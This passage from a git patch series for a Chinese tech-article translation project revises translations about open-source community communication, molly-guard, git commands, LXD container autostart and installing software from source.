不同的时区, 以及文化差异也带来了新的挑战. +任何一个团队合作过的人都知道意见分歧是很难被克服的。对于在线社区来说,语言障碍,不同的时区,以及文化差异也带来了新的挑战。 ### 语言障碍 -英语是开源社区中的主流语言, 因此英语不好的人会很难看懂文档和修改意见. 为了克服这个问题,吸引其他地区的社区成员,你需要邀请双语者参与到社区中来. 问问周围的人--你会发现意想不到的精通其他语言的人. 社区的双语成员可以帮助别人跨越语言障碍, 并且可以通过翻译软件和文档来扩大项目的受众范围. +英语是开源社区中的主流语言,因此英语不好的人会很难看懂文档和修改意见。为了克服这个问题,吸引其他地区的社区成员,你需要邀请双语者参与到社区中来。问问周围的人--你会发现意想不到的精通其他语言的人。社区的双语成员可以帮助别人跨越语言障碍,并且可以通过翻译软件和文档来扩大项目的受众范围。 -人们使用的编程语言也不一样. 你可能喜欢用Bash而其他人则可能更喜欢 Python, Ruby, C 等其他语言. 这意味着,人们可能由于编程语言的原因而难以为你的代码库做贡献. 项目负责人为项目选择一门被软件社区广泛认可的语言至关重要. 如果你选择了一门偏门的语言, 则很少人能够参与其中. +人们使用的编程语言也不一样。你可能喜欢用 Bash 而其他人则可能更喜欢 Python,Ruby,C 等其他语言。这意味着,人们可能由于编程语言的原因而难以为你的代码库做贡献。项目负责人为项目选择一门被软件社区广泛认可的语言至关重要。如果你选择了一门偏门的语言,则很少人能够参与其中。 ### 不同的时区 -时区为开源社区带来了另一个挑战. 比如, 若你在芝加哥,想与一个在伦敦的成员安排一次视频会议, 你需要调整8小时的时差. 根据合作者的地理位置,你可能要在深夜或者清晨工作. +时区为开源社区带来了另一个挑战。比如,若你在芝加哥,想与一个在伦敦的成员安排一次视频会议,你需要调整 8 小时的时差。根据合作者的地理位置,你可能要在深夜或者清晨工作。 -肉体转移(Physical sprints),让你的团队在同一个时区工作可以帮助克服这个挑战, 但这中方法只有极少数社区才能够负担的起. 我们还可以定期举行虚拟会议讨论项目, 建立一个固定的时间和地点以供所有人来讨论未决的事项, 即将发布的版本等其他主题. +肉体转移 (Physical sprints),让你的团队在同一个时区工作可以帮助克服这个挑战,但这中方法只有极少数社区才能够负担的起。我们还可以定期举行虚拟会议讨论项目,建立一个固定的时间和地点以供所有人来讨论未决的事项,即将发布的版本等其他主题。 -不同的时区也可以成为你的优势,因为团队成员可以全天候的工作. 若你拥有一个类似 IRC 这样的实时交流平台, 用户可以在任意时间都能找到人来回答问题. +不同的时区也可以成为你的优势,因为团队成员可以全天候的工作。若你拥有一个类似 IRC 这样的实时交流平台,用户可以在任意时间都能找到人来回答问题。 ### 文化差异 -文化差异是开源组织面临的最大挑战. 世界各地的人都有不同的思考方式, 计划以及解决问题的方法. 政治环境也会影响工作环境并影响决策. +文化差异是开源组织面临的最大挑战。世界各地的人都有不同的思考方式,计划以及解决问题的方法。政治环境也会影响工作环境并影响决策。 -作为项目负责人, 你应该努力构建一种能包容不同看法的环境. 文化差异可以鼓励社区沟通. 建设性的讨论总是对项目有益,因为它可以帮助社区成员从不同角度看待问题. 不同意见也有助于解决问题. +作为项目负责人,你应该努力构建一种能包容不同看法的环境。文化差异可以鼓励社区沟通。建设性的讨论总是对项目有益,因为它可以帮助社区成员从不同角度看待问题。不同意见也有助于解决问题。 -要成功开源, 团队必须学会拥抱差异. 这不简单, 但多样性最终会使社区收益. +要成功开源,团队必须学会拥抱差异。这不简单,但多样性最终会使社区收益。 ## 加强在线沟通的其他方法 -**本地化:** 在线社区成员可能会发现位于附近的贡献者--去见个面并组织一个本地社区. 只需要两个人就能组建一个社区了. 可以邀请其他当地用户或雇员参与其中; 他们甚至还能为以后的聚会提供场所呢. +**本地化:** 在线社区成员可能会发现位于附近的贡献者--去见个面并组织一个本地社区。只需要两个人就能组建一个社区了。可以邀请其他当地用户或雇员参与其中; 他们甚至还能为以后的聚会提供场所呢。 -**组织活动:** 组织活动是构建本地社区的好方法,而且费用也不高. 你可以在当地的咖啡屋或者啤酒厂聚会,庆祝最新版本的发布或者某个核心功能的实现. 组织的活动越多, 人们参与的热情就越高(即使只是因为单纯的好奇心). 最终, 可能会找到一家公司为你提供聚会的场地,或者为你提供赞助. +**组织活动:** 组织活动是构建本地社区的好方法,而且费用也不高。你可以在当地的咖啡屋或者啤酒厂聚会,庆祝最新版本的发布或者某个核心功能的实现。组织的活动越多,人们参与的热情就越高(即使只是因为单纯的好奇心)。最终,可能会找到一家公司为你提供聚会的场地,或者为你提供赞助。 -**保持联系:** 每次活动后, 联系本地社区成员. 收起电子邮箱地址或者其他联系方式并邀请他们参与到你的交流平台中. 邀请他们为其他社区做贡献. 你很可能会发现很多当地的人才,运气好的话,甚至可能发现新的核心开发人员! +**保持联系:** 每次活动后,联系本地社区成员。收起电子邮箱地址或者其他联系方式并邀请他们参与到你的交流平台中。邀请他们为其他社区做贡献。你很可能会发现很多当地的人才,运气好的话,甚至可能发现新的核心开发人员! -**分享经验:** 本地社区是一种非常有价值的资源, 对你,对其他社区来说都是. 与可能受益的人分享你的发现和经验. 如果你不清楚(译者注:这里原文是说sure,但是根据上下文,这里应该是not sure)如何策划一场活动或会议, 可以咨询其他人的意见. 也许能找到一些有经验的人帮你走到正轨. +**分享经验:** 本地社区是一种非常有价值的资源,对你,对其他社区来说都是。与可能受益的人分享你的发现和经验。如果你不清楚(译者注:这里原文是说 sure,但是根据上下文,这里应该是 not sure) 如何策划一场活动或会议,可以咨询其他人的意见。也许能找到一些有经验的人帮你走到正轨。 -**关注文化差异:** 记住,文化规范因地点和人口而异, 因此在清晨安排某项活动可能适用于一个地方的人,但是不合适另一个地方的人. 当然, 你可以--也应该--利用其他社区的参考资料来更好地理解这种差异性, 但有时你也需要通过试错的方式来学习. 不要忘了分享你所学到的东西,让别人也从中获益. +**关注文化差异:** 记住,文化规范因地点和人口而异,因此在清晨安排某项活动可能适用于一个地方的人,但是不合适另一个地方的人。当然,你可以--也应该--利用其他社区的参考资料来更好地理解这种差异性,但有时你也需要通过试错的方式来学习。不要忘了分享你所学到的东西,让别人也从中获益。 -**检查个人观点:** 避免在工作场合提出带有很强主观色彩的观点(尤其是与政治相关的观点). 这会抑制开放式的沟通和问题的解决. 相反,应该专注于鼓励与团队成员展开建设性讨论. 如果你发现陷入了激烈的争论中, 那么后退一步,冷静一下, 然后再从更加积极的角度出发重新进行讨论. 讨论必须是有建设性的,从多个角度讨论问题对社区有益. 永远不要把自己的主观观念放在社区的总体利益之前. +**检查个人观点:** 避免在工作场合提出带有很强主观色彩的观点(尤其是与政治相关的观点)。这会抑制开放式的沟通和问题的解决。相反,应该专注于鼓励与团队成员展开建设性讨论。如果你发现陷入了激烈的争论中,那么后退一步,冷静一下,然后再从更加积极的角度出发重新进行讨论。讨论必须是有建设性的,从多个角度讨论问题对社区有益。永远不要把自己的主观观念放在社区的总体利益之前。 -**尝试异步沟通:** 这些天,实时通讯平台已经引起了大家的关注, 但除此之外还别忘了电子邮件. 如果没有在网络平台上找到人的话,可以给他们发送一封电子邮件. 有可能你很快就能得到回复. 考虑使用那些专注于异步沟通的平台,比如 [Twist][1], 也不要忘了查看并更新论坛和维基. +**尝试异步沟通:** 这些天,实时通讯平台已经引起了大家的关注,但除此之外还别忘了电子邮件。如果没有在网络平台上找到人的话,可以给他们发送一封电子邮件。有可能你很快就能得到回复。考虑使用那些专注于异步沟通的平台,比如 [Twist][1],也不要忘了查看并更新论坛和维基。 -**使用不同的解决方案:** 并不存在一个单一的完美的解决方法, 学习最有效的方法还是通过经验来学习. 从反复试验中你可以学到很多东西.不要害怕失败; 你慧聪失败中学到很多东西从而不停地进步. +**使用不同的解决方案:** 并不存在一个单一的完美的解决方法,学习最有效的方法还是通过经验来学习。从反复试验中你可以学到很多东西。不要害怕失败; 你慧聪失败中学到很多东西从而不停地进步。 ## 社区需要营养 -将社区想象成是一颗植物的幼苗. 你需要每天给它浇水,提供阳光和氧气. 社区也是一样: 倾听贡献者的声音, 记住你在与活生生的人进行互动,他们需要以合适的方式进行持续的交流. 如果社区缺少了人情味, 人们会停止对它的贡献. +将社区想象成是一颗植物的幼苗。你需要每天给它浇水,提供阳光和氧气。社区也是一样:倾听贡献者的声音,记住你在与活生生的人进行互动,他们需要以合适的方式进行持续的交流。如果社区缺少了人情味,人们会停止对它的贡献。 -最后, 请记住,每个社区都是不同的, 没有一种单一的解决方法能够适用于所有社区. 坚持不断地从社区中学习并适应这个社区. +最后,请记住,每个社区都是不同的,没有一种单一的解决方法能够适用于所有社区。坚持不断地从社区中学习并适应这个社区。 -------------------------------------------------------------------------------- From a23397dbd71803dad2a31d238fd5ea40b724bc5c Mon Sep 17 00:00:00 2001 From: darksun Date: Mon, 25 Dec 2017 20:02:26 +0800 Subject: [PATCH 0777/1627] translated --- ... from accidental shutdowns-reboots with molly-guard.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/translated/tech/20170219 How to protects Linux and Unix machines from accidental shutdowns-reboots with molly-guard.md b/translated/tech/20170219 How to protects Linux and Unix machines from accidental shutdowns-reboots with molly-guard.md index 1b34c0a41b..d6727004a5 100644 --- a/translated/tech/20170219 How to protects Linux and Unix machines from accidental shutdowns-reboots with molly-guard.md +++ b/translated/tech/20170219 How to protects Linux and Unix machines from accidental shutdowns-reboots with molly-guard.md @@ -6,10 +6,10 @@ 最新我在 tweet 上发了一通牢骚: -> I seems to run into this stuff again and again :( Instead of typing: +> 我总是一遍又一遍地犯下同样的错误 :( 本来应该输入Instead of typing: > sudo virsh reboot d1 > -> I just typed & rebooted my own box +> 缺总是输错重启了自己的电脑 > sudo reboot d1 > > -- nixCraft (@nixcraft) [February 19,2017][5] @@ -21,11 +21,11 @@ Molly-Guard **尝试阻止你不小心关闭或重启 Linux 服务器**。它在 Debian/Ubuntu 中的包描述为: -> The package installs a shell script that overrides the existing shutdown/reboot/halt/poweroff/coldreboot/pm-hibernate/pm-suspend* commands and first runs a set of scripts,which all have to exit successfully, before molly-guard invokes the real command。 One of the scripts checks for existing SSH sessions。 If any of the four commands are called interactively over an SSH session, the shell script prompts you to enter the name of the host you wish to shut down。 This should adequately prevent you from accidental shutdowns and reboots。 +> 这个包会安装一个 shell 脚本来屏蔽已经存在的 shutdown/reboot/halt/poweroff/coldreboot/pm-hibernate/pm-suspend* 命令。 molly-gurad 会首先运行一系列的脚本,只有在所有的脚本都返回成功的条件下, 才会调用真正的命令。 其中一个脚本会检查是否存在 SSH 会话。 如果是通过 SSH 会话调用的命令, shell 脚本会提示你输入相关闭主机的名称。 这应该足够防止你发生意外的关机或重启了。 貌似 [molly-guard][6] 还是个专有名词: -> A shield to prevent tripping of some Big Red Switch by clumsy or ignorant hands。Originally used of the plexiglass covers improvised for the BRS on an IBM 4341 after a programmer's toddler daughter (named Molly) frobbed it twice in one day。 Later generalized to covers over stop/reset switches on disk drives and networking equipment。 In hardware catalogues, you'll see the much less interesting description "guarded button"。 +> 一种用于防止由于笨拙或者不小心触碰道大红开关的屏障。最初指的临时盖在 IBM 4341 的大红按钮上的有机玻璃,因为有一个程序员蹒跚学步的女儿(名叫Molly)一天之内重启了它两次。 后来这个东西也被用来盖住磁盘和网络设备上的停止/重启按钮。在硬件目录中,你很少会看到 “guarded button” 这样无趣的描"。 ### 如何安装 molly guard From e942510d7ce63ebd6e32e293e6cef446a91c4583 Mon Sep 17 00:00:00 2001 From: darksun Date: Mon, 25 Dec 2017 20:03:52 +0800 Subject: [PATCH 0778/1627] typo --- ...chines from accidental shutdowns-reboots with molly-guard.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/translated/tech/20170219 How to protects Linux and Unix machines from accidental shutdowns-reboots with molly-guard.md b/translated/tech/20170219 How to protects Linux and Unix machines from accidental shutdowns-reboots with molly-guard.md index d6727004a5..8cd6dee741 100644 --- a/translated/tech/20170219 How to protects Linux and Unix machines from accidental shutdowns-reboots with molly-guard.md +++ b/translated/tech/20170219 How to protects Linux and Unix machines from accidental shutdowns-reboots with molly-guard.md @@ -9,7 +9,7 @@ > 我总是一遍又一遍地犯下同样的错误 :( 本来应该输入Instead of typing: > sudo virsh reboot d1 > -> 缺总是输错重启了自己的电脑 +> 却总是输错重启了自己的电脑 > sudo reboot d1 > > -- nixCraft (@nixcraft) [February 19,2017][5] From 589f70dcb66211fd4dd633f52e3331453f60a788 Mon Sep 17 00:00:00 2001 From: darksun Date: Mon, 25 Dec 2017 20:04:24 +0800 Subject: [PATCH 0779/1627] remove --- ...chines from accidental shutdowns-reboots with molly-guard.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/translated/tech/20170219 How to protects Linux and Unix machines from accidental shutdowns-reboots with molly-guard.md b/translated/tech/20170219 How to protects Linux and Unix machines from accidental shutdowns-reboots with molly-guard.md index 8cd6dee741..db104d561e 100644 --- a/translated/tech/20170219 How to protects Linux and Unix machines from accidental shutdowns-reboots with molly-guard.md +++ b/translated/tech/20170219 How to protects Linux and Unix machines from accidental shutdowns-reboots with molly-guard.md @@ -6,7 +6,7 @@ 最新我在 tweet 上发了一通牢骚: -> 我总是一遍又一遍地犯下同样的错误 :( 本来应该输入Instead of typing: +> 我总是一遍又一遍地犯下同样的错误 :( 本来应该输入: > sudo virsh reboot d1 > > 却总是输错重启了自己的电脑 From cb2dc65f7117b74760dfa58c6dfd3e8de92debaa Mon Sep 17 00:00:00 2001 From: liuxinyu123 Date: Mon, 25 Dec 2017 20:42:04 +0800 Subject: [PATCH 0780/1627] remove source file --- ...Beginners to PRO” guide for GIT commands.md | 217 ------------------ 1 file changed, 217 deletions(-) delete mode 100644 sources/tech/20170730 Complete “Beginners to PRO” guide for GIT commands.md diff --git a/sources/tech/20170730 Complete “Beginners to PRO” guide for GIT commands.md b/sources/tech/20170730 Complete “Beginners to PRO” guide for GIT commands.md deleted file mode 100644 index a99a0aeed1..0000000000 --- a/sources/tech/20170730 Complete “Beginners to PRO” guide for GIT commands.md +++ /dev/null @@ -1,217 +0,0 @@ -translating by liuxinyu123 - -Complete “Beginners to PRO” guide for GIT commands -====== -In our [**earlier tutorial,**][1] we have learned to install git on our machines. In this tutorial, we will discuss how we can use git i.e. various commands that are used with git. So let's start,In our earlier tutorial, we have learned to install git on our machines. In this tutorial, we will discuss how we can use git i.e. various commands that are used with git. So let's start, - -( **Recommended Read** : [**How to install GIT on Linux (Ubuntu & CentOS)**][1] ) - -### Setting user information - -This should the first step after installing git. We will add user information (user name & email), so that the when we commit the code, commit messages will be generated with the user information which makes it easier to keep track of the commit progress. To add user information about user, command is 'git config' - - **$ git config - - global user.name "Daniel"** - - **$ git config - - global user.email "dan.mike@xyz.com"** - -After adding the information, we will now check if the information has been updated successfully by running, - - **$ git config - - list** - -& we should see our user information as the output. - -( **Also Read** : [**Scheduling important jobs with CRONTAB**][3] ) - -### GIT Commands - -#### Create a new repository - -To create a new repository, run - - **$ git init** - - -#### Search a repository - -To search a repository, command is - - **$ git grep "repository"** - - -#### Connect to a remote repository - -To connect to a remote repository, run - - **$ git remote add origin remote_server** - -Then to check all the configured remote server, - - **$ git remote -v** - - -#### Clone a repository - -To clone a repository from a local server, run the following commands - - **$ git clone repository_path** - -If we want to clone a repository locate at remote server, then the command to clone the repository is, - - **$ git clone[[email protected]][2] :/repository_path** - - -#### List Branches in repository - -To check list all the available & the current working branch, execute - - **$ git branch** - - -#### Create new branch - -To create & use a new branch, command is - - **$ git checkout -b 'branchname'** - - -#### Deleting a branch - -To delete a branch, execute - - **$ git branch -d 'branchname'** - -To delete a branch on remote repository, execute - - **$ git push origin : 'branchname'** - - -#### Switch to another branch - -To switch to another branch from current branch, use - - **$ git checkout 'branchname'** - - -#### Adding files - -To add a file to the repo, run - - **$ git add filename** - - -#### Status of files - -To check status of files (files that are to be commited or are to added), run - - **$ git status** - - -#### Commit the changes - -After we have added a file or made changes to one, we will commit the code by running, - - **$ git commit -a** - -To commit changes to head and not to remote repository, command is - - **$ git commit -m "message"** - - -#### Push changes - -To push changes made to the master branch of the repository, run - - **$ git push origin master** - - -#### Push branch to repository - -To push the changes made on a single branch to remote repository, run - - **$ git push origin 'branchname'** - -To push all branches to remote repository, run - - **$ git push -all origin** - - -#### Merge two branches - -To merge another branch into the current active branch, use - - **$ git merge 'branchname'** - - -#### Merge from remote to local server - -To download/pull changes to working directory on local server from remote server, run - - **$ git pull** - - -#### Checking merge conflicts - -To view merge conflicts against base file, run - - **$ git diff -base 'filename'** - -To see all the conflicts, run - - **$ git diff** - -If we want to preview all the changes before merging, execute - - **$ git diff 'source-branch' 'target-branch'** - - -#### Creating tags - -To create tags to mark any significant changes, run - - **$ git tag 'tag number' 'commit id'** - -We can find commit id by running, - - **$ git log** - - -#### Push tags - -To push all the created tags to remote server, run - - **$ git push -tags origin** - - -#### Revert changes made - -If we want to replace changes made on current working tree with the last changes in head, run - - **$ git checkout -'filename'** - -We can also fetch the latest history from remote server & point it local repository's master branch, rather than dropping all local changes made. To do this, run - - **$ git fetch origin** - - **$ git reset -hard master** - -That's it guys, these are the commands that we can use with git server. We will be back soon with more interesting tutorials. If you wish that we write a tutorial on a specific topic, please let us know via comment box below. As usual, your comments & suggestions are always welcome. - - --------------------------------------------------------------------------------- - -via: http://linuxtechlab.com/beginners-to-pro-guide-for-git-commands/ - -作者:[Shusain][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://linuxtechlab.com/author/shsuain/ -[1] http://linuxtechlab.com/install-git-linux-ubuntu-centos/ -[2] /cdn-cgi/l/email-protection -[3] http://linuxtechlab.com/scheduling-important-jobs-crontab/ -[4] https://www.facebook.com/linuxtechlab/ -[5] https://twitter.com/LinuxTechLab -[6] https://plus.google.com/+linuxtechlab -[7] http://linuxtechlab.com/contact-us-2/ From 4beb7e6411f927bc46fcf4c2218f555d73d1f6e0 Mon Sep 17 00:00:00 2001 From: Ezio Date: Mon, 25 Dec 2017 20:55:52 +0800 Subject: [PATCH 0781/1627] =?UTF-8?q?=E4=BF=AE=E6=AD=A3=E6=96=87=E4=BB=B6?= =?UTF-8?q?=E5=90=8D?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...=> 20170730 Complete Beginners to PRO guide for GIT commands.md} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename translated/tech/{20170730 Complete “Beginners to PRO” guide for GIT commands.md => 20170730 Complete Beginners to PRO guide for GIT commands.md} (99%) diff --git a/translated/tech/20170730 Complete “Beginners to PRO” guide for GIT commands.md b/translated/tech/20170730 Complete Beginners to PRO guide for GIT commands.md similarity index 99% rename from translated/tech/20170730 Complete “Beginners to PRO” guide for GIT commands.md rename to translated/tech/20170730 Complete Beginners to PRO guide for GIT commands.md index dafacc412b..33423f1b7d 100644 --- a/translated/tech/20170730 Complete “Beginners to PRO” guide for GIT commands.md +++ b/translated/tech/20170730 Complete Beginners to PRO guide for GIT commands.md @@ -167,4 +167,4 @@ via: http://linuxtechlab.com/beginners-to-pro-guide-for-git-commands/ [4]:https://www.facebook.com/linuxtechlab/ [5]:https://twitter.com/LinuxTechLab [6]:https://plus.google.com/+linuxtechlab -[7]:http://linuxtechlab.com/contact-us-2/ \ No newline at end of file +[7]:http://linuxtechlab.com/contact-us-2/ From 171eaab179e2585a41714cac86a75e2d051ca259 Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 25 Dec 2017 13:43:18 +0800 Subject: [PATCH 0782/1627] PRF&PUB:20170219 How to auto start LXD containers at boot time in Linux.md @geekpi --- ...rt LXD containers at boot time in Linux.md | 37 ++++++++++++++----- 1 file changed, 28 insertions(+), 9 deletions(-) rename {translated/tech => published}/20170219 How to auto start LXD containers at boot time in Linux.md (68%) diff --git a/translated/tech/20170219 How to auto start LXD containers at boot time in Linux.md b/published/20170219 How to auto start LXD containers at boot time in Linux.md similarity index 68% rename from translated/tech/20170219 How to auto start LXD containers at boot time in Linux.md rename to published/20170219 How to auto start LXD containers at boot time in Linux.md index b6e5df86c4..9d3f9cde45 100644 --- a/translated/tech/20170219 How to auto start LXD containers at boot time in Linux.md +++ b/published/20170219 How to auto start LXD containers at boot time in Linux.md @@ -1,12 +1,13 @@ 如何在 Linux 启动时自动启动 LXD 容器 ====== -我正在使用基于 LXD(“Linux 容器”)的虚拟机。如何在 Linux 系统中启动时自动启动 LXD 容器? -你可以在 LXD 启动后启动容器。你需要将 boot.autostart 设置为 true。你可以使用 boot.autostart.priority(默认值为 0)选项来定义启动容器的顺序(从最高开始)。你也可以使用 boot.autostart.delay(默认值0)选项定义在启动一个容器后等待几秒后启动另一个容器。 +Q:我正在使用基于 LXD(“Linux 容器”)的虚拟机。如何在 Linux 系统中启动时自动启动 LXD 容器? + +当 LXD 在启动时运行,你就可以随时启动容器。你需要将 `boot.autostart` 设置为 `true`。你可以使用 `boot.autostart.priority`(默认值为 `0`)选项来定义启动容器的顺序(从最高开始)。你也可以使用 `boot.autostart.delay`(默认值 `0`)选项定义在启动一个容器后等待几秒后启动另一个容器。 ### 语法 -上面讨论的关键字可以使用 lxc 工具用下面的语法来设置: +上面讨论的关键字可以使用 `lxc` 工具用下面的语法来设置: ``` $ lxc config set {vm-name} {key} {value} @@ -18,27 +19,45 @@ $ lxc config set {vm-name} boot.autostart.delay integer ### 如何在 Ubuntu Linux 16.10 中让 LXD 容器在启动时启动? 输入以下命令: -`$ lxc config set {vm-name} boot.autostart true` + +``` +$ lxc config set {vm-name} boot.autostart true +``` + 设置一个 LXD 容器名称 “nginx-vm” 以在启动时启动 -`$ lxc config set nginx-vm boot.autostart true` + +``` +$ lxc config set nginx-vm boot.autostart true +``` + 你可以使用以下语法验证设置: + ``` $ lxc config get {vm-name} boot.autostart $ lxc config get nginx-vm boot.autostart ``` + 示例输出: + ``` true ``` 你可以使用下面的语法在启动容器后等待 10 秒钟后启动另一个容器: -`$ lxc config set nginx-vm boot.autostart.delay 10` + +``` +$ lxc config set nginx-vm boot.autostart.delay 10 +``` + 最后,通过设置最高值来定义启动容器的顺序。确保 db_vm 容器首先启动,然后再启动 nginx_vm。 + ``` $ lxc config set db_vm boot.autostart.priority 100 $ lxc config set nginx_vm boot.autostart.priority 99 ``` -使用[下面的 bash 循环在 Linux 上查看所有][1]值: + +使用[下面的 bash 循环在 Linux 上查看所有][1]配置值: + ``` #!/bin/bash echo 'The current values of each vm boot parameters:' @@ -53,8 +72,8 @@ do done ``` - 示例输出: + ![Fig.01: Get autostarting LXD containers values using a bash shell script][2] @@ -64,7 +83,7 @@ via: https://www.cyberciti.biz/faq/how-to-auto-start-lxd-containers-at-boot-time 作者:[Vivek Gite][a] 译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 30362bd0d12d049bc8b7c548f194dd36edaa99ef Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 25 Dec 2017 21:51:29 +0800 Subject: [PATCH 0783/1627] PRF:20171006 How to Install Software from Source Code... and Remove it Afterwards.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @qhwdw 辛苦了,这篇这么长。不过有些字句没有仔细斟酌,还需更细心些。 --- ...Source Code... and Remove it Afterwards.md | 134 +++++++++--------- 1 file changed, 67 insertions(+), 67 deletions(-) diff --git a/translated/tech/20171006 How to Install Software from Source Code... and Remove it Afterwards.md b/translated/tech/20171006 How to Install Software from Source Code... and Remove it Afterwards.md index 9673771438..1df0dd4f64 100644 --- a/translated/tech/20171006 How to Install Software from Source Code... and Remove it Afterwards.md +++ b/translated/tech/20171006 How to Install Software from Source Code... and Remove it Afterwards.md @@ -1,21 +1,21 @@ -怎么用源代码安装软件 … 以及如何卸载它 +详解如何用源代码安装软件,以及如何卸载它 ============================================================ ![How to install software from source code](https://itsfoss.com/wp-content/uploads/2017/10/install-software-from-source-code-linux-800x450.jpg) - _简介:这篇文章详细介绍了在 Linux 中怎么用源代码安装程序,以及怎么去卸载源代码安装的程序。_ +_简介:这篇文章详细介绍了在 Linux 中怎么用源代码安装程序,以及怎么去卸载用源代码安装的程序。_ -你的 Linux 分发版的其中一个最大的优点就是它的包管理器和相关的软件库。正是因为它们,你才可以去下载所需的工具和资源,以及在你的计算机上完全自动化地安装一个新软件。 +Linux 发行版的一个最大的优点就是它的包管理器和相关的软件库。通过它们提供的资源和工具,你才能够以完全自动化的方式在你的计算机上下载和安装软件。 -但是,尽管他们付出了很多的努力,包维护者仍然没法做到处理好每个用到的依赖,也不可能将所有的可用软件都打包进去。因此,仍然存在需要你自已去编译和安装一个新软件的情形。对于我来说,到目前为止,最主要的原因是,当我需要去运行一个特定的版本时我还要编译一些软件。或者,我想去修改源代码或使用一些想要的编译选项。 +但是,尽管付出了很多的努力,包维护者仍然没法照顾好每种情况,也不可能将所有的可用软件都打包进去。因此,仍然存在需要你自已去编译和安装一个新软件的情形。对于我来说,到目前为止,最主要的原因是,我编译一些软件是我需要去运行一个特定的版本。或者是我想去修改源代码或使用一些想要的编译选项。 -如果你也属于后一种情况,那你已经知道你应该做什么了。但是,对于绝大多数的 Linux 用户来说,第一次从源代码中编译和安装一个软件看上去像是一个入门的仪式:它让很多人感到恐惧;但是,如果你能克服困难,你将可能进入一个全新的世界,并且,如果你做到了,那么你将成为社区中享有特权的一部分人。 +如果你也属于后一种情况,那你已经知道你应该怎么做了。但是,对于绝大多数的 Linux 用户来说,第一次从源代码中编译和安装一个软件看上去像是一个入门仪式:它让很多人感到恐惧;但是,如果你能克服困难,你将可能进入一个全新的世界,并且,如果你做到了,那么你将成为社区中享有特权的一部分人。 -[Suggested readHow To Install And Remove Software In Ubuntu [Complete Guide]][8] +- [建议阅读:怎样在 Ubuntu 中安装和删除软件(完全指南)][8] ### A. 在 Linux 中从源代码开始安装软件 -这正是我们要做的。因为这篇文章的需要,我要在我的系统上安装 [NodeJS][9] 8.1.1。它是个完全真实的版本。这个版本在 Debian 仓库中不可用: +这正是我们要做的。因为这篇文章的需要,我要在我的系统上安装 [NodeJS][9] 8.1.1。它是个完全真实的版本。这个版本在 Debian 仓库中没有: ``` sh$ apt-cache madison nodejs | grep amd64 @@ -26,7 +26,7 @@ sh$ apt-cache madison nodejs | grep amd64 nodejs | 0.10.29~dfsg-1~bpo70+1 | http://ftp.fr.debian.org/debian wheezy-backports/main amd64 Packages ``` -### 第 1 步:从 GitHub 上获取源代码 +#### 第 1 步:从 GitHub 上获取源代码 像大多数开源项目一样,NodeJS 的源代码可以在 GitHub:[https://github.com/nodejs/node][10] 上找到。 @@ -34,19 +34,19 @@ sh$ apt-cache madison nodejs | grep amd64 ![The NodeJS official GitHub repository](https://itsfoss.com/wp-content/uploads/2017/07/nodejs-github-account.png) -如果你不熟悉 [GitHub][11]、[git][12] 或者提到的其它的包含这个软件源代码的 [版本管理系统][13],以及多年来对该软件的所有修改的历史,最终找到该软件的最早版本。对于开发者来说,保持它的历史版本有很多好处。对现在的我来说,其中一个好处是可以得到任何一个给定时间点的项目源代码。更准确地说,当我希望的 8.1.1 版发布时,我可以像他们一样第一时间得到源代码。即便他们有很多的修改。 +如果你不熟悉 [GitHub][11],[git][12] 或者提到的其它 [版本管理系统][13]包含了这个软件的源代码,以及多年来对该软件的所有修改的历史。甚至可以回溯到该软件的最早版本。对于开发者来说,保留它的历史版本有很多好处。如今对我来说,其中一个好处是可以得到任何一个给定时间点的项目源代码。更准确地说,我可以得到我所要的 8.1.1 发布时的源代码。即便从那之后他们有了很多的修改。 ![Choose the v8.1.1 tag in the NodeJS GitHub repository](https://itsfoss.com/wp-content/uploads/2017/07/nodejs-github-choose-revision-tag.png) -在 GitHub 上,你可以使用 “branch” 按钮导航到这个软件的不同版本。[在 Git 中 “Branch” 和 “tags” 相关的一些概念][14]。总的来说,开发者创建 “branch” 和 “tags” 在项目历史中对重要事件保持跟踪,就像当她们启用一个新特性或者发布一个新版本。在这里先不详细介绍了,所有你想知道的都可以看 _tagged_ 的 “v8.1.1” 版本。 +在 GitHub 上,你可以使用 “branch” (分支)按钮导航到这个软件的不同版本。[“分支” 和 “标签” 是 Git 中一些相关的概念][14]。总的来说,开发者创建 “分支” 和 “标签” 来在项目历史中对重要事件保持跟踪,比如当他们启用一个新特性或者发布一个新版本时。在这里先不详细介绍了,你现在只需要知道我在找被标记为 “v8.1.1” 的版本。 ![The NodeJS GitHub repository as it was at the time the v8.1.1 tag was created](https://itsfoss.com/wp-content/uploads/2017/07/nodejs-github-revision-811.png) -在选择了 “v8.1.1” 标签后,页面被刷新,最显著的变化是标签现在作为 URL 的一部分出现。另外,你可能会注意到文件改变数据也不同。在源代码树上,你可以看到现在已经创建了 v8.1.1 标签。在某种意义上,你也可以认为像 git 这样的版本管理工具是一个时光穿梭机,允许你返回进入到以前的项目历史中。 +在选择了 “v8.1.1” 标签后,页面被刷新,最显著的变化是标签现在作为 URL 的一部分出现。另外,你可能会注意到文件改变日期也有所不同。你现在看到的源代码树是创建了 v8.1.1 标签时的代码。在某种意义上,你也可以认为像 git 这样的版本管理工具是一个时光穿梭机,允许你在项目历史中来回穿梭。 ![NodeJS GitHub repository download as a ZIP button](https://itsfoss.com/wp-content/uploads/2017/07/nodejs-github-revision-download-zip.png) -在这个时候,我们可以下载 NodeJS 8.1.1 的源代码。你不要错过大的蓝色按钮,建议下载一个项目的 ZIP 压缩包。对于我来说,为讲解的目的,我从命令行中下载并解压这个 ZIP 压缩包。但是,如果你更喜欢使用一个 [GUI][15] 工具,不用担心,你可以这样做: +此时,我们可以下载 